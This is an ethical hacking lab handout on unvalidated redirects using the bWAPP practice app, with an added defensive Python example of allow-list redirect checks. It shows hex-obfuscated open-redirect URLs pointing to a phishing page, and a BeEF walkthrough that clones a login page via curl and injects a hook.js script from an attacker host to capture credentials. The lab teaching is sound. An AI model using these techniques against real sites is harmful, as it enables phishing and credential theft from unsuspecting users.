Week 8 - A10 - Unvalidated Redirects & Forwards

The document describes an exercise on unvalidated redirects and forwards security vulnerabilities. It explains that web applications can be exploited if they redirect or forward users to other pages without validating the destination URLs. The exercise demonstrates how an attacker could craft obfuscated URLs to redirect a victim to a phishing site or unauthorized page by abusing an application's unvalidated redirect feature. It also shows how to clone a legitimate web page using BEEF to steal login credentials by redirecting the victim to the fake page rather than the real one.

17/03/2021

A10 - Unvalidated Redirects & Forwards


Ethical Hacking Lab Exercise

Introduction
Web applications frequently redirect and forward users to other pages and websites, and
use untrusted data to determine the destination pages. Without proper validation, attackers
can redirect victims to phishing or malware sites, or use forwards to access unauthorized
pages.

The following article has an excellent explanation: -

http://www.troyhunt.com/2011/12/owasp-top-10-for-net-developers-part-10.html

Reference: -
https://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards

SECTION 1: bWAPP Exercises


The following exercises are from menu A10.

Unvalidated Redirects & Forwards (1)

- In Windows, run Firefox, access the bWAPP web page and then run Live HTTP Headers.

- Select Blog and then Beam.

The request is as shown below: -

This illustrates that the application will re-direct to itsecgames.blogspot.com.

The hack is a social engineering (phishing) attack: the user is sent a link that takes them to a
different page, with obfuscation used to mask the real URL, i.e.

C McLean School of Computing UAD Page 1 514733133.docx

The original link is: -

http://192.168.1.100/bWAPP/unvalidated_redir_fwd_1.php?url=http%3A%2F%2Fitsecgames.blogspot.com&form=submit

We could instead send the link

http://192.168.1.100/bWAPP/unvalidated_redir_fwd_1.php?url=http%3A%2F%2F192.168.1.1/bad.html&form=submit

and obfuscate the real location of the link (i.e. obfuscate http://192.168.1.1/bad.html): -

http://192.168.1.100/bWAPP/unvalidated_redir_fwd_1.php?url=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%2f%62%61%64%2e%68%74%6d%6c&form=submit

- Using the following link obfuscator, prove that the three links below are the same
(i.e. they all re-direct to www.bbc.co.uk): http://codewelt.com/proj/urlobfuscator

http://192.168.1.100/bWAPP/unvalidated_redir_fwd_1.php?url=http://www.bbc.co.uk&form=submit

http://192.168.1.100/bWAPP/unvalidated_redir_fwd_1.php?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%62%62%63%2E%63%6F%2E%75%6B&form=%73%75%62%6D%69%74

http://192.168.1.100/bWAPP/unvalidated_redir_fwd_1.php?%75%72%6C=%68%74%74%70%3A%2F%2F%77%77%77%2E%62%62%63%2E%63%6F%2E%75%6B&%66%6F%72%6D=%73%75%62%6D%69%74
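The three links above differ only in percent-encoding, which is exactly why a server-side check must work on the decoded destination rather than on the raw link. The following added example (not part of the handout or of bWAPP) decodes the `url` parameter the way a server would, shows that the weak substring check the exercise implicitly defeats can be bypassed, and contrasts it with an allow-list check on the parsed host name. The bWAPP host 192.168.1.100 and the allowed host itsecgames.blogspot.com are taken from the exercise; the function names are my own.

```python
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed inputs reproducing the exercise's three BBC links.
BBC_LINKS = [
    "http://192.168.1.100/bWAPP/unvalidated_redir_fwd_1.php"
    "?url=http://www.bbc.co.uk&form=submit",
    "http://192.168.1.100/bWAPP/unvalidated_redir_fwd_1.php"
    "?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%62%62%63%2E%63%6F%2E%75%6B&form=%73%75%62%6D%69%74",
    "http://192.168.1.100/bWAPP/unvalidated_redir_fwd_1.php"
    "?%75%72%6C=%68%74%74%70%3A%2F%2F%77%77%77%2E%62%62%63%2E%63%6F%2E%75%6B&%66%6F%72%6D=%73%75%62%6D%69%74",
]

# The only host this page legitimately redirects to (the Blog -> Beam link).
ALLOWED_HOSTS = {"itsecgames.blogspot.com"}


def redirect_target(link: str) -> Optional[str]:
    """Return the decoded `url` parameter as the application would receive it.

    parse_qs percent-decodes both parameter names and values, so an obfuscated
    %75%72%6C key and a hex-encoded value collapse to the same plain destination.
    """
    values = parse_qs(urlsplit(link).query).get("url")
    return values[0] if values else None


def naive_check(target: str) -> bool:
    """Weak check: substring match on the trusted host. A path or userinfo
    component containing the trusted name passes, so this is bypassable."""
    return "itsecgames.blogspot.com" in target


def is_safe_redirect(target: str) -> bool:
    """Hardened check: parse the decoded destination and compare its real host
    against an allow-list. Scheme-less and non-http(s) destinations are refused."""
    parts = urlsplit(target)
    if parts.scheme not in ("http", "https"):
        return False
    host = (parts.hostname or "").lower()   # hostname ignores any user@ prefix
    return host in ALLOWED_HOSTS
```

Relative paths are deliberately not accepted by this allow-list; an application that also needs local redirects should add a separate rule for same-origin paths.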

Unvalidated Redirects & Forwards (2)

- Using the same technique as above, craft an obfuscated URL to re-direct to a web page
of your choosing.


OPTIONAL EXERCISE: - Site cloning using BEEF


In the above exercise, the user would be tricked into visiting a page of our choosing. In the
following exercise, we will:

- Clone the bWAPP logon page for use with BEEF.
- Re-direct the user to this logon page by crafting a link.
- Use BEEF to capture the user's keystrokes (i.e. user name & password).

In Kali Linux, open a terminal and run BEEF using the following: -

cd /usr/share/beef-xss
./beef

We will now clone the site and send it to BEEF using curl. The syntax is as follows: -

curl -H "Content-Type: application/json; charset=UTF-8" -d '{"url":"http://192.168.1.100/bWAPP/login.php","mount":"/login.php"}' -X POST "http://192.168.1.1:3000/api/seng/clone_page?token=cc44a82cb3d566916681cabd9cd5d93f1eb110f0"

Where: -

- http://192.168.1.100/bWAPP/login.php is the site we wish to clone.
- http://192.168.1.1:3000 is the URL where BEEF is running.
- The token cc44a82cb3d566916681cabd9cd5d93f1eb110f0 is the RESTful API key
obtained from the BEEF window.

In Kali Linux, open a second terminal and paste the following: -

curl -H "Content-Type: application/json; charset=UTF-8" -d '{"url":"http://192.168.1.100/bWAPP/login.php","mount":"/login.php"}' -X POST "http://192.168.1.1:3000/api/seng/clone_page?token=XXXX"

where XXXX should be replaced with the key copied from the BEEF RESTful API.


The BEEF window should show something similar to the following (i.e. it has cloned the page and
added the BEEF hook to the top of it).

One thing needs to be edited in the cloned web page.

- Browse to the following file: -

- Edit the line

<script type="text/javascript" src="http://0.0.0.0:3000/hook.js"></script>

- and change it to point to the correct IP address:

<script type="text/javascript" src="http://192.168.1.1:3000/hook.js"></script>


The original bWAPP page link we used was

http://192.168.1.100/bWAPP/unvalidated_redir_fwd_1.php?url=http://www.bbc.co.uk&form=submit

We can now use

http://192.168.1.100/bWAPP/unvalidated_redir_fwd_1.php?url=http://192.168.1.1:3000/login.php&form=submit

This will hook the user's browser into BEEF.
